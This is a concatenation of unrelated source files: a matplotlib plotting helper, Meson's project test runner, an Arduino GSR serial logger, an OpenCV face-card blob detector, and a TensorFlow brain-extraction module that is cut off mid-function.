options.fig_size = ([12, 9], [0.08, 0.14, 0.91, 0.83])
# options.fig_size = ([6, 8], [0.16, 0.22, 0.79, 0.77])
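# e.g. --fig-size "12,9" sets only the figure size (a default axes rectangle
# is used), while --fig-size "12,9,0.08,0.14,0.91,0.83" also sets the axes rectangle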
#----------------------------------------------------------------------------
def maximum(iterable, default):
'''Like max(), but returns a default value if the iterable is empty.'''
try:
return max(iterable)
except ValueError:
return default
#----------------------------------------------------------------------------
def minimum(iterable, default):
'''Like min(), but returns a default value if the iterable is empty.'''
try:
return min(iterable)
except ValueError:
return default
#----------------------------------------------------------------------------
def sizeof_bytes(num):
'''Output a number as human readable bytes.'''
for x in ['bytes','KB','MB','GB','TB']:
if num < 1024.0:
return "%.0f %s" % (num, x)
num /= 1024.0
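# e.g. sizeof_bytes(512) -> "512 bytes", sizeof_bytes(2048) -> "2 KB",
# sizeof_bytes(3 * 1024**3) -> "3 GB"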
#----------------------------------------------------------------------------
# plot N series of data onto a single graph
# each series is a array, there are N arrays in the supplied map
# graph_map, a map of arrays of {x,y,other} data
# labelstrings, {xaxis, yaxis, series_variable}
def plot_one_collection(graph_map, labelstrings, axes, axisfunction, minmax) :
print("Plotting %i series of '%s'" % (len(graph_map), labelstrings[2]))
# for convenience/brevity get the base, min, max for each axis
xb = minmax[0][0]
x1 = minmax[0][1]
x2 = minmax[0][2]
xm = minmax[0][3]
yb = minmax[1][0]
y1 = minmax[1][1]
y2 = minmax[1][2]
ym = minmax[1][3]
# restart markers and colours from beginning of list for each new graph
localmarkers = itertools.cycle(markers)
localcolours = itertools.cycle(colours)
series_keys = sorted(graph_map.keys())
for index, value in enumerate(series_keys):
key = value
series = sorted(graph_map[key])
#print "The series is ", series
# we can just plot the series directly, but just in case we add support
# for error bars etc and use {x,y,stddev,etc...} in future, we will pull out
# the values for plotting manually.
values = [[v[0],v[1]] for v in series]
#print "the values are ", values
if (xb==0) and (yb==0):
axes.plot(*list(zip(*values)), markersize=8, marker=next(localmarkers), color=next(localcolours))
elif (xb!=0) and (yb==0):
axes.semilogx(*list(zip(*values)), basex=xb, markersize=8, marker=next(localmarkers), color=next(localcolours))
elif (xb==0) and (yb!=0):
axes.semilogy(*list(zip(*values)), basey=yb, markersize=8, marker=next(localmarkers), color=next(localcolours))
elif (xb!=0) and (yb!=0):
axes.loglog(*list(zip(*values)), basex=xb, basey=yb, markersize=8, marker=next(localmarkers), color=next(localcolours))
else:
print("Error, unsupported log/lin options")
# generate labels for each power of N on the axes
if (xb!=0):
# generate a list of numbers for the grid marks
xlabels = tuple(i for i in (xb**x for x in range(x1,x2+1)) )
# setup the xaxis parameters
axes.set_xlim(minimum(xlabels,1)*(1.0-xm), maximum(xlabels,3)*(1.0+xm))
axes.set_xticklabels(xlabels)
axes.set_xscale('log', basex=xb)
axes.xaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(axisfunction))
axes.set_xlabel(labelstrings[0])
axes.tick_params(axis='x', which='major', labelsize=9)
axes.tick_params(axis='x', which='minor', labelsize=8)
else:
axes.set_xlim(x1, x2)
if (yb!=0):
# generate a list of numbers for the grid marks
ylabels = tuple(i for i in (yb**y for y in range(y1,y2+1)) )
# setup the yaxis parameters
axes.set_ylim(minimum(ylabels,1)*(1.0-ym), maximum(ylabels,3)*(1.0+ym))
axes.set_yticklabels(ylabels)
axes.set_yscale('log', basey=yb)
axes.yaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(lambda x, pos: str('%.2f' % x)))
axes.set_ylabel(labelstrings[1])
axes.tick_params(axis='y', which='major', labelsize=9)
axes.tick_params(axis='y', which='minor', labelsize=8)
else:
axes.set_ylim(y1, y2)
axes.xaxis.grid(True)
axes.yaxis.grid(True)
#
# define some custom minor tick locations on y axis:
#
#axes.yaxis.set_minor_formatter(plt.FormatStrFormatter('%8.4d'))
#axes.yaxis.set_minor_locator(plt.FixedLocator([0.375,0.75,1.5,3,6,12]))
#axes.tick_params(axis='y', which='minor', labelsize=8)
#axes.grid(b=True, which='major', color='b', linestyle='-')
#axes.grid(b=True, which='minor', color='g', linestyle='--')
# coordinates are window coordinates from 0 to 1
axes.set_title(labelstrings[2], fontsize=10)
#----------------------------------------------------------------------------
def plot_configuration(graph_map, mapnames, axesnames, titlefunction, legendfunction, legendtitlefunction, axisfunction, minmax, bbox) :
fig = plt.figure(figsize = options.fig_size[0])
axes = []
# the supplied graphs come as a 2D array of params
num_param1 = len(list(graph_map.keys()))
num_param2 = len(list(graph_map[list(graph_map.keys())[0]].keys()))
# All the graphs of param2 will be the same type,
# but we need one legend per param1 regardless
# so num_param2legend is used in places to add space for the extra legend plot
num_param2legend = num_param2+1
numrows = num_param1
numcols = num_param2legend
# if the array is 1xN or Nx1, rearrange the num rows/cols
# to fit the page a little better instead of having one long row/column of plots
rearranged = False
if (num_param1==1) or (num_param2==1):
total = num_param1*num_param2legend
print("total is ", total)
better = int(math.sqrt(total))
numrows = better
numcols = int(math.ceil(total/float(better)))
rearranged = True
print("Rearranged graphs from %i x %i using layout %i x %i" % (num_param1, num_param2, numrows, numcols))
# create an array of graphs for our parameter space
# grid cells are defined by {row, col} from top left and down
print("Creating array of graphs rows %i, cols %i" % (numrows, numcols))
row = 0
col = 0
graph_keys = sorted(graph_map.keys())
for param1_i in range(num_param1):
param1_key = graph_keys[param1_i]
param1_results = graph_map[param1_key]
param1_keys = sorted(param1_results.keys())
print("param1_ type ", param1_key)
# The legend must cover all graphs, not just the final one plotted
legend_entries = []
for param2_i in range(num_param2):
newplot = plt.subplot2grid((numrows, numcols), (row, col), colspan=1)
axes.append( newplot )
try:
print("num params %i and keys" % num_param2, param1_keys)
param2_key = param1_keys[param2_i]
param2_results = param1_results[param2_key]
param2_keys = sorted(param2_results.keys())
print("param2_ type ", param2_key)
print("generating plot at {%i,%i}" % (row, col))
plot_one_collection(param2_results,
[axesnames[0], axesnames[1], mapnames[1] + " " + titlefunction(param2_key)],
newplot,axisfunction, minmax)
# merge lists for the legend
legend_entries = list(set(legend_entries) | set(param2_keys))
except:
print("Failed to plot {%i,%i}" % (row, col))
col += 1
if ((col % numcols)==0):
col = 0
row += 1
legend_entries = sorted(legend_entries)
# at the end of each param2 group, there should be a legend
leg = plt.subplot2grid((numrows, numcols), (row, col), colspan=1)
leg.axis('off')
leg.set_title(legendtitlefunction(param1_key))
print("Legend title removed ")
#leg.set_title(graph_keys[param1_i], fontsize=11)
axes.append( leg )
# restart markers and colours from beginning of list for each new graph
localmarkers = itertools.cycle(markers)
localcolours = itertools.cycle(colours)
for item in legend_entries:
leg.plot([], label=mapnames[2] + " " + legendfunction(item),
markersize=8,
marker=next(localmarkers),
color=next(localcolours))
leg.legend(
loc = 'lower left',
ncol=(1,1)[len(legend_entries)>5],
bbox_to_anchor=(bbox[0],bbox[1]),
fontsize=8,
handlelength=3, borderpad=1.2, labelspacing=1.2,
shadow=True)
print("added legend at {%i,%i}" % (row, col))
col += 1
# if we reach the end of the graph row
if ((col % numcols)==0):
col = 0
row += 1
plt.tight_layout()
if options.show_graph :
plt.show()
return fig
#----------------------------------------------------------------------------
def insert_safe(a_map, key1, key2, key3, value) :
#print(key1,key2,key3,value[0],value[1])
found = False
# create the 3 level deep map entries if they are not present
if not (key1) in a_map:
a_map[key1] = {}
if not (key2) in a_map[key1]:
a_map[key1][key2] = {}
if not (key3) in a_map[key1][key2]:
a_map[key1][key2][key3] = []
for item in a_map[key1][key2][key3]:
if item[0] == value[0]:
item[1] = item[1]+value[1]
item[2] += 1
found = True
print(key1,key2,key3,value[0],value[1], "Duplicate", item[2])
break
if (not found):
a_map[key1][key2][key3].append(value + [1])
#----------------------------------------------------------------------------
def average_map(a_map) :
for key1 in a_map:
for key2 in a_map[key1]:
for key3 in a_map[key1][key2]:
for value in a_map[key1][key2][key3]:
if value[2]>1:
value[1] = value[1]/value[2]
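#----------------------------------------------------------------------------
# Minimal illustration of the two helpers above (keys and values are made up):
# repeated entries with the same x are summed and counted by insert_safe(),
# then average_map() turns the accumulated y back into a mean.
#
# results = {}
# insert_safe(results, 'put', '1 rank', 'block', [1024, 10.0])
# insert_safe(results, 'put', '1 rank', 'block', [1024, 20.0]) # duplicate x
# average_map(results)
# # results['put']['1 rank']['block'] == [[1024, 15.0, 2]]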
``` |
{
"source": "jok-ts/meson",
"score": 2
} |
#### File: jok-ts/meson/run_project_tests.py
```python
from glob import glob
import os, subprocess, shutil, sys, signal
from io import StringIO
from ast import literal_eval
import sys, tempfile
from mesonbuild import environment
from mesonbuild import mesonlib
from mesonbuild import mlog
from mesonbuild import mesonmain
from mesonbuild.mesonlib import stringlistify
from mesonbuild.scripts import meson_test, meson_benchmark
import argparse
import xml.etree.ElementTree as ET
import time
import multiprocessing
import concurrent.futures as conc
from mesonbuild.coredata import backendlist
class TestResult:
def __init__(self, msg, stdo, stde, mlog, conftime=0, buildtime=0, testtime=0):
self.msg = msg
self.stdo = stdo
self.stde = stde
self.mlog = mlog
self.conftime = conftime
self.buildtime = buildtime
self.testtime = testtime
class AutoDeletedDir():
def __init__(self, d):
self.dir = d
def __enter__(self):
os.makedirs(self.dir, exist_ok=True)
return self.dir
def __exit__(self, _type, value, traceback):
# On Windows, shutil.rmtree fails sometimes, because 'the directory is not empty'.
# Retrying fixes this.
# That's why we don't use tempfile.TemporaryDirectory, but wrap the deletion in the AutoDeletedDir class.
retries = 5
for i in range(0, retries):
try:
shutil.rmtree(self.dir)
return
except OSError:
if i == retries-1:
raise
time.sleep(0.1 * (2**i))
passing_tests = 0
failing_tests = 0
skipped_tests = 0
failing_logs = []
print_debug = 'MESON_PRINT_TEST_OUTPUT' in os.environ
do_debug = not {'MESON_PRINT_TEST_OUTPUT', 'TRAVIS', 'APPVEYOR'}.isdisjoint(os.environ)
meson_command = os.path.join(os.getcwd(), 'meson')
if not os.path.exists(meson_command):
meson_command += '.py'
if not os.path.exists(meson_command):
raise RuntimeError('Could not find main Meson script to run.')
class StopException(Exception):
def __init__(self):
super().__init__('Stopped by user')
stop = False
def stop_handler(signal, frame):
global stop
stop = True
signal.signal(signal.SIGINT, stop_handler)
signal.signal(signal.SIGTERM, stop_handler)
#unity_flags = ['--unity']
unity_flags = []
backend_flags = None
compile_commands = None
test_commands = None
install_commands = None
def setup_commands(backend):
global backend_flags, compile_commands, test_commands, install_commands
msbuild_exe = shutil.which('msbuild')
if backend == 'vs2010' or (backend is None and msbuild_exe is not None):
backend_flags = ['--backend=vs2010']
compile_commands = ['msbuild']
test_commands = ['msbuild', 'RUN_TESTS.vcxproj']
install_commands = []
elif backend == 'vs2015':
backend_flags = ['--backend=vs2015']
compile_commands = ['msbuild']
test_commands = ['msbuild', 'RUN_TESTS.vcxproj']
install_commands = []
elif backend == 'xcode' or (backend is None and mesonlib.is_osx()):
backend_flags = ['--backend=xcode']
compile_commands = ['xcodebuild']
test_commands = ['xcodebuild', '-target', 'RUN_TESTS']
install_commands = []
else:
backend_flags = []
ninja_command = environment.detect_ninja()
if ninja_command is None:
raise RuntimeError('Could not find Ninja v1.6 or newer')
if do_debug:
compile_commands = [ninja_command, '-v']
else:
compile_commands = [ninja_command]
compile_commands += ['-w', 'dupbuild=err']
test_commands = [ninja_command, 'test', 'benchmark']
install_commands = [ninja_command, 'install']
def get_relative_files_list_from_dir(fromdir):
paths = []
for (root, _, files) in os.walk(fromdir):
reldir = os.path.relpath(root, start=fromdir)
for f in files:
path = os.path.join(reldir, f).replace('\\', '/')
if path.startswith('./'):
path = path[2:]
paths.append(path)
return paths
def platform_fix_exe_name(fname):
if not fname.endswith('?exe'):
return fname
fname = fname[:-4]
if mesonlib.is_windows():
return fname + '.exe'
return fname
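# Illustration (not in the original): installed_files.txt marks binaries that
# get a platform-specific suffix with '?exe', so
#   platform_fix_exe_name('usr/bin/prog?exe') -> 'usr/bin/prog.exe' on Windows
#   platform_fix_exe_name('usr/bin/prog?exe') -> 'usr/bin/prog' elsewhere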
def validate_install(srcdir, installdir):
# List of installed files
info_file = os.path.join(srcdir, 'installed_files.txt')
# If this exists, the test does not install any other files
noinst_file = 'usr/no-installed-files'
expected = {}
found = {}
ret_msg = ''
# Generate list of expected files
if os.path.exists(os.path.join(installdir, noinst_file)):
expected[noinst_file] = False
elif os.path.exists(info_file):
with open(info_file) as f:
for line in f:
expected[platform_fix_exe_name(line.strip())] = False
# Check if expected files were found
for fname in expected:
if os.path.exists(os.path.join(installdir, fname)):
expected[fname] = True
for (fname, found) in expected.items():
if not found:
ret_msg += 'Expected file {0} missing.\n'.format(fname)
# Check if there are any unexpected files
found = get_relative_files_list_from_dir(installdir)
for fname in found:
if fname not in expected and not fname.endswith('.pdb'):
ret_msg += 'Extra file {0} found.\n'.format(fname)
return ret_msg
def log_text_file(logfile, testdir, stdo, stde):
global stop, executor, futures
logfile.write('%s\nstdout\n\n---\n' % testdir)
logfile.write(stdo)
logfile.write('\n\n---\n\nstderr\n\n---\n')
logfile.write(stde)
logfile.write('\n\n---\n\n')
if print_debug:
print(stdo)
print(stde, file=sys.stderr)
if stop:
print("Aborting..")
for f in futures:
f[2].cancel()
executor.shutdown()
raise StopException()
def run_configure_inprocess(commandlist):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
old_stderr = sys.stderr
sys.stderr = mystderr = StringIO()
try:
returncode = mesonmain.run(commandlist[0], commandlist[1:])
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
return (returncode, mystdout.getvalue(), mystderr.getvalue())
def run_test_inprocess(testdir):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
old_stderr = sys.stderr
sys.stderr = mystderr = StringIO()
old_cwd = os.getcwd()
os.chdir(testdir)
try:
returncode_test = meson_test.run(['meson-private/meson_test_setup.dat'])
returncode_benchmark = meson_benchmark.run(['meson-private/meson_benchmark_setup.dat'])
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
os.chdir(old_cwd)
return (max(returncode_test, returncode_benchmark), mystdout.getvalue(), mystderr.getvalue())
def parse_test_args(testdir):
args = []
try:
with open(os.path.join(testdir, 'test_args.txt'), 'r') as f:
content = f.read()
try:
args = literal_eval(content)
except Exception:
raise Exception('Malformed test_args file.')
args = stringlistify(args)
except FileNotFoundError:
pass
return args
def run_test(skipped, testdir, extra_args, flags, compile_commands, install_commands, should_fail):
if skipped:
return None
with AutoDeletedDir(tempfile.mkdtemp(prefix='b ', dir='.')) as build_dir:
with AutoDeletedDir(tempfile.mkdtemp(prefix='i ', dir=os.getcwd())) as install_dir:
try:
return _run_test(testdir, build_dir, install_dir, extra_args, flags, compile_commands, install_commands, should_fail)
finally:
mlog.shutdown() # Close the log file because otherwise Windows wets itself.
def _run_test(testdir, test_build_dir, install_dir, extra_args, flags, compile_commands, install_commands, should_fail):
test_args = parse_test_args(testdir)
gen_start = time.time()
gen_command = [meson_command, '--prefix', '/usr', '--libdir', 'lib', testdir, test_build_dir]\
+ flags + test_args + extra_args
(returncode, stdo, stde) = run_configure_inprocess(gen_command)
try:
logfile = os.path.join(test_build_dir, 'meson-logs/meson-log.txt')
with open(logfile, errors='ignore') as f:
mesonlog = f.read()
except Exception:
mesonlog = 'No meson-log.txt found.'
gen_time = time.time() - gen_start
if should_fail == 'meson':
if returncode != 0:
return TestResult('', stdo, stde, mesonlog, gen_time)
return TestResult('Test that should have failed succeeded', stdo, stde, mesonlog, gen_time)
if returncode != 0:
return TestResult('Generating the build system failed.', stdo, stde, mesonlog, gen_time)
if 'msbuild' in compile_commands[0]:
sln_name = glob(os.path.join(test_build_dir, '*.sln'))[0]
comp = compile_commands + [os.path.split(sln_name)[-1]]
else:
comp = compile_commands
build_start = time.time()
pc = subprocess.Popen(comp, cwd=test_build_dir,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(o, e) = pc.communicate()
build_time = time.time() - build_start
stdo += o.decode(sys.stdout.encoding)
stde += e.decode(sys.stdout.encoding)
if should_fail == 'build':
if pc.returncode != 0:
return TestResult('', stdo, stde, mesonlog, gen_time)
return TestResult('Test that should have failed to build succeeded', stdo, stde, mesonlog, gen_time)
if pc.returncode != 0:
return TestResult('Compiling source code failed.', stdo, stde, mesonlog, gen_time, build_time)
test_start = time.time()
# Note that we don't test that running e.g. 'ninja test' actually
# works. One hopes that this is a common enough happening that
# it is picked up immediately on development.
(returncode, tstdo, tstde) = run_test_inprocess(test_build_dir)
test_time = time.time() - test_start
stdo += tstdo
stde += tstde
if should_fail == 'test':
if returncode != 0:
return TestResult('', stdo, stde, mesonlog, gen_time)
return TestResult('Test that should have failed to run unit tests succeeded', stdo, stde, mesonlog, gen_time)
if returncode != 0:
return TestResult('Running unit tests failed.', stdo, stde, mesonlog, gen_time, build_time, test_time)
if len(install_commands) == 0:
return TestResult('', stdo, stde, mesonlog, gen_time, build_time, test_time)
else:
env = os.environ.copy()
env['DESTDIR'] = install_dir
pi = subprocess.Popen(install_commands, cwd=test_build_dir, env=env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(o, e) = pi.communicate()
stdo += o.decode(sys.stdout.encoding)
stde += e.decode(sys.stdout.encoding)
if pi.returncode != 0:
return TestResult('Running install failed.', stdo, stde, mesonlog, gen_time, build_time, test_time)
return TestResult(validate_install(testdir, install_dir), stdo, stde, mesonlog, gen_time, build_time, test_time)
def gather_tests(testdir):
tests = [t.replace('\\', '/').split('/', 2)[2] for t in glob(os.path.join(testdir, '*'))]
testlist = [(int(t.split()[0]), t) for t in tests]
testlist.sort()
tests = [os.path.join(testdir, t[1]) for t in testlist]
return tests
def have_d_compiler():
if shutil.which("ldc2"):
return True
elif shutil.which("ldc"):
return True
elif shutil.which("gdc"):
return True
elif shutil.which("dmd"):
return True
return False
def detect_tests_to_run():
all_tests = []
all_tests.append(('common', gather_tests('test cases/common'), False))
all_tests.append(('failing-meson', gather_tests('test cases/failing'), False))
all_tests.append(('failing-build', gather_tests('test cases/failing build'), False))
all_tests.append(('failing-tests', gather_tests('test cases/failing tests'), False))
all_tests.append(('prebuilt', gather_tests('test cases/prebuilt'), False))
all_tests.append(('platform-osx', gather_tests('test cases/osx'), False if mesonlib.is_osx() else True))
all_tests.append(('platform-windows', gather_tests('test cases/windows'), False if mesonlib.is_windows() else True))
all_tests.append(('platform-linux', gather_tests('test cases/linuxlike'), False if not (mesonlib.is_osx() or mesonlib.is_windows()) else True))
all_tests.append(('framework', gather_tests('test cases/frameworks'), False if not mesonlib.is_osx() and not mesonlib.is_windows() else True))
all_tests.append(('java', gather_tests('test cases/java'), False if not mesonlib.is_osx() and shutil.which('javac') else True))
all_tests.append(('C#', gather_tests('test cases/csharp'), False if shutil.which('mcs') else True))
all_tests.append(('vala', gather_tests('test cases/vala'), False if shutil.which('valac') else True))
all_tests.append(('rust', gather_tests('test cases/rust'), False if shutil.which('rustc') else True))
all_tests.append(('d', gather_tests('test cases/d'), False if have_d_compiler() else True))
all_tests.append(('objective c', gather_tests('test cases/objc'), False if not mesonlib.is_windows() else True))
all_tests.append(('fortran', gather_tests('test cases/fortran'), False if shutil.which('gfortran') else True))
all_tests.append(('swift', gather_tests('test cases/swift'), False if shutil.which('swiftc') else True))
all_tests.append(('python3', gather_tests('test cases/python3'), False if shutil.which('python3') else True))
return all_tests
def run_tests(extra_args):
global passing_tests, failing_tests, stop, executor, futures
all_tests = detect_tests_to_run()
logfile = open('meson-test-run.txt', 'w', encoding="utf_8")
junit_root = ET.Element('testsuites')
conf_time = 0
build_time = 0
test_time = 0
executor = conc.ProcessPoolExecutor(max_workers=multiprocessing.cpu_count())
for name, test_cases, skipped in all_tests:
current_suite = ET.SubElement(junit_root, 'testsuite', {'name' : name, 'tests' : str(len(test_cases))})
if skipped:
print('\nNot running %s tests.\n' % name)
else:
print('\nRunning %s tests.\n' % name)
futures = []
for t in test_cases:
# Jenkins screws us over by automatically sorting test cases by name
# and getting it wrong by not doing logical number sorting.
(testnum, testbase) = os.path.split(t)[-1].split(' ', 1)
testname = '%.3d %s' % (int(testnum), testbase)
should_fail = False
if name.startswith('failing'):
should_fail = name.split('failing-')[1]
result = executor.submit(run_test, skipped, t, extra_args, unity_flags + backend_flags, compile_commands, install_commands, should_fail)
futures.append((testname, t, result))
for (testname, t, result) in futures:
result = result.result()
if result is None:
print('Skipping:', t)
current_test = ET.SubElement(current_suite, 'testcase', {'name' : testname,
'classname' : name})
ET.SubElement(current_test, 'skipped', {})
global skipped_tests
skipped_tests += 1
else:
without_install = "" if len(install_commands) > 0 else " (without install)"
if result.msg != '':
print('Failed test%s: %s' % (without_install, t))
print('Reason:', result.msg)
failing_tests += 1
failing_logs.append(result.stdo)
failing_logs.append(result.stde)
else:
print('Succeeded test%s: %s' % (without_install, t))
passing_tests += 1
conf_time += result.conftime
build_time += result.buildtime
test_time += result.testtime
total_time = conf_time + build_time + test_time
log_text_file(logfile, t, result.stdo, result.stde)
current_test = ET.SubElement(current_suite, 'testcase', {'name' : testname,
'classname' : name,
'time' : '%.3f' % total_time})
if result.msg != '':
ET.SubElement(current_test, 'failure', {'message' : result.msg})
stdoel = ET.SubElement(current_test, 'system-out')
stdoel.text = result.stdo
stdeel = ET.SubElement(current_test, 'system-err')
stdeel.text = result.stde
print("\nTotal configuration time: %.2fs" % conf_time)
print("Total build time: %.2fs" % build_time)
print("Total test time: %.2fs" % test_time)
ET.ElementTree(element=junit_root).write('meson-test-run.xml', xml_declaration=True, encoding='UTF-8')
def check_file(fname):
linenum = 1
with open(fname, 'rb') as f:
lines = f.readlines()
for line in lines:
if b'\t' in line:
print("File %s contains a literal tab on line %d. Only spaces are permitted." % (fname, linenum))
sys.exit(1)
if b'\r' in line:
print("File %s contains DOS line ending on line %d. Only unix-style line endings are permitted." % (fname, linenum))
sys.exit(1)
linenum += 1
def check_format():
for (root, _, files) in os.walk('.'):
for file in files:
if file.endswith('.py') or file.endswith('.build') or file == 'meson_options.txt':
fullname = os.path.join(root, file)
check_file(fullname)
def pbcompile(compiler, source, objectfile):
if compiler == 'cl':
cmd = [compiler, '/nologo', '/Fo'+objectfile, '/c', source]
else:
cmd = [compiler, '-c', source, '-o', objectfile]
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def generate_pb_object(compiler, object_suffix):
source = 'test cases/prebuilt/1 object/source.c'
objectfile = 'test cases/prebuilt/1 object/prebuilt.' + object_suffix
pbcompile(compiler, source, objectfile)
return objectfile
def generate_pb_static(compiler, object_suffix, static_suffix):
source = 'test cases/prebuilt/2 static/libdir/best.c'
objectfile = 'test cases/prebuilt/2 static/libdir/best.' + object_suffix
stlibfile = 'test cases/prebuilt/2 static/libdir/libbest.' + static_suffix
pbcompile(compiler, source, objectfile)
if compiler == 'cl':
linker = ['lib', '/NOLOGO', '/OUT:' + stlibfile, objectfile]
else:
linker = ['ar', 'csr', stlibfile, objectfile]
subprocess.check_call(linker)
os.unlink(objectfile)
return stlibfile
def generate_prebuilt():
static_suffix = 'a'
if shutil.which('cl'):
compiler = 'cl'
static_suffix = 'lib'
elif shutil.which('cc'):
compiler = 'cc'
elif shutil.which('gcc'):
compiler = 'gcc'
else:
raise RuntimeError("Could not find C compiler.")
if mesonlib.is_windows():
object_suffix = 'obj'
else:
object_suffix = 'o'
objectfile = generate_pb_object(compiler, object_suffix)
stlibfile = generate_pb_static(compiler, object_suffix, static_suffix)
return (objectfile, stlibfile)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Run the test suite of Meson.")
parser.add_argument('extra_args', nargs='*',
help='arguments that are passed directly to Meson (remember to have -- before these).')
parser.add_argument('--backend', default=None, dest='backend',
choices = backendlist)
options = parser.parse_args()
setup_commands(options.backend)
script_dir = os.path.split(__file__)[0]
if script_dir != '':
os.chdir(script_dir)
check_format()
pbfiles = generate_prebuilt()
try:
run_tests(options.extra_args)
except StopException:
pass
for f in pbfiles:
os.unlink(f)
print('\nTotal passed tests:', passing_tests)
print('Total failed tests:', failing_tests)
print('Total skipped tests:', skipped_tests)
if failing_tests > 0 and ('TRAVIS' in os.environ or 'APPVEYOR' in os.environ):
print('\nMesonlogs of failing tests\n')
for l in failing_logs:
print(l, '\n')
sys.exit(failing_tests)
``` |
{
"source": "Jokubas126/P4_project_applications",
"score": 3
} |
#### File: P4_project_applications/GSR/writeGSR.py
```python
import serial
import matplotlib.pyplot as plt
import time
import statistics
moment = time.strftime("%Y-%b-%d__%Hh%Mm%Ss",time.localtime())
rawdata = []
count = 0
fileName = 'data_' + moment +'.txt'
#number of readline iterations; at roughly one reading per second this is about 16 minutes
timeOut = 1000
#connect to the arduino
try:
ard = serial.Serial('COM4', baudrate = 9600, timeout = 1)
except:
print('Serial not found!')
#get a list of data
while count < timeOut:
arduinoData = ard.readline()
rawdata.append(str(arduinoData))
count += 1
#clean the data from "b'xxx;xx\r\n'" to "xxx;xx"
def clean(list):
newList = []
for i in range(len(list)):
#starting from the third element in the string
temp=list[i][2:]
#ending at the last fifth string from the end of the string
newList.append(temp[:-5])
return newList
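#quick illustration with a made-up reading: str(b'512;3.3\r\n') gives
#"b'512;3.3\\r\\n'", so dropping the first two and last five characters
#leaves "512;3.3"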
cleandata = clean(rawdata)
#writing the data from the list to the file
def write(list):
file = open(fileName, 'w')
for i in range(len(list)):
file.write(list[i] + '\n')
file.close()
write(cleandata)
``` |
{
"source": "Jokubas126/PokerAssistant_CV",
"score": 3
} |
#### File: Scripts/finalCode/DetectFaceCard.py
```python
import numpy as np
import cv2
def find_face_card(image):
#Returns true if image has yellow BLOBs
# making an object to hold parameters of the blob detection
params = cv2.SimpleBlobDetector_Params()
# define parameters for the blob detector
params.filterByArea = True # allows using area parameter
# these parameters are dependant on image size
params.minArea = 100 # min and max areas of pixels for 1 blob
params.maxArea = 10000
params.filterByColor = True # to care about the color
params.filterByCircularity = False # to not care about circularity (more circular = bigger angles)
params.filterByConvexity = False # to not care about convexity
params.filterByInertia = False # doesn't care how much like a circle it is (difference in radius)
## convert to hsv
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, (16, 180, 100), (30, 255, 255)) #Look for colour only existing in face cards
## slice the yellow
imask = mask > 0
yellow = np.zeros_like(image, np.uint8)
yellow[imask] = image[imask]
memes, threshImg = cv2.threshold(yellow, 0, 255, cv2.THRESH_BINARY)
#cv2.imshow("Yellow color: ",threshImg)
params.blobColor = 255
detector = cv2.SimpleBlobDetector_create(params) # making the detector by the parameters set before
keypoints = detector.detect(threshImg) # detecting the blobs
im_with_keypoints = cv2.drawKeypoints(threshImg, keypoints, np.array([]), (0, 0, 255),
cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
#cv2.imshow("Detected blue: ", im_with_keypoints)
blobCount = len(keypoints)
return blobCount > 0
``` |
{
"source": "Jokubaskaralius/deepbrain",
"score": 2
} |
#### File: deepbrain/deepbrain/extractor.py
```python
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # or any {'0', '1', '2'}
import tensorflow as tf
import numpy as np
from skimage.transform import resize
import re
import nibabel as nib
from multiprocessing import Pool
PB_FILE = os.path.join(os.path.dirname(__file__), "models", "graph_v2.pb")#"extractor", "graph_v2.pb")
CHECKPOINT_DIR = os.path.join(os.path.dirname(__file__), "models", "v2") #"extractor", "v2")
class Extractor:
def __init__(self):
self.SIZE = 128
self.load_pb()
def load_pb(self):
graph = tf.Graph()
self.sess = tf.compat.v1.Session(graph=graph)
with tf.io.gfile.GFile(PB_FILE, 'rb') as f: #tf.compat.v1.gfile.FastGFile(PB_FILE, 'rb')
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
with self.sess.graph.as_default():
tf.import_graph_def(graph_def)
self.img = graph.get_tensor_by_name("import/img:0")
self.training = graph.get_tensor_by_name("import/training:0")
self.dim = graph.get_tensor_by_name("import/dim:0")
self.prob = graph.get_tensor_by_name("import/prob:0")
self.pred = graph.get_tensor_by_name("import/pred:0")
def load_ckpt(self):
self.sess = tf.Session()
ckpt_path = tf.train.latest_checkpoint(CHECKPOINT_DIR)
saver = tf.train.import_meta_graph('{}.meta'.format(ckpt_path))
saver.restore(self.sess, ckpt_path)
g = tf.get_default_graph()
self.img = g.get_tensor_by_name("img:0")
self.training = g.get_tensor_by_name("training:0")
self.dim = g.get_tensor_by_name("dim:0")
self.prob = g.get_tensor_by_name("prob:0")
self.pred = g.get_tensor_by_name("pred:0")
def run(self, image):
shape = image.shape
img = resize(image, (self.SIZE, self.SIZE, self.SIZE), mode='constant', anti_aliasing=True)
img = (img / np.max(img))
img = np.reshape(img, [1, self.SIZE, self.SIZE, self.SIZE, 1])
prob = self.sess.run(self.prob, feed_dict={self.training: False, self.img: img}).squeeze()
prob = resize(prob, (shape), mode='constant', anti_aliasing=True)
#tf.compat.v1.reset_default_graph()
return prob
def run_wrapper(self, image):
with Pool(1) as p:
return p.apply(self.run, (image,))
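# Hedged usage sketch (the file path is hypothetical): load a volume with
# nibabel and turn the voxel-wise probability map into a brain mask, as done
# in worksForBatch() below.
#
# img = nib.load("/path/to/t1.nii.gz")
# data = img.get_fdata()
# ext = Extractor()
# prob = ext.run(data) # or ext.run_wrapper(data) to run in a child process
# mask = prob > 0.5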
def subfolder_list(dir_name):
return [f.path for f in os.scandir(dir_name) if f.is_dir()]
def _process(image):
ext = Extractor()
prob = ext.run(image)
return prob
def process_image(image, _process):
with Pool(1) as p:
temp = p.apply(_process, (image,))
print(temp)
return temp
#Test to see if the GPU resources are released after the fix
def worksForBatch():
#ext = Extractor()
path = "/home/jokubas/DevWork/3rdYearProject/data/grade3"
folders = subfolder_list(path)
cnt = 0
for folder2 in folders:
for folder in subfolder_list(folder2):
if (re.search(".*T1-axial", folder) is not None):#folder1.split(sep='-')[0]) is not None):
for item in os.walk(folder):
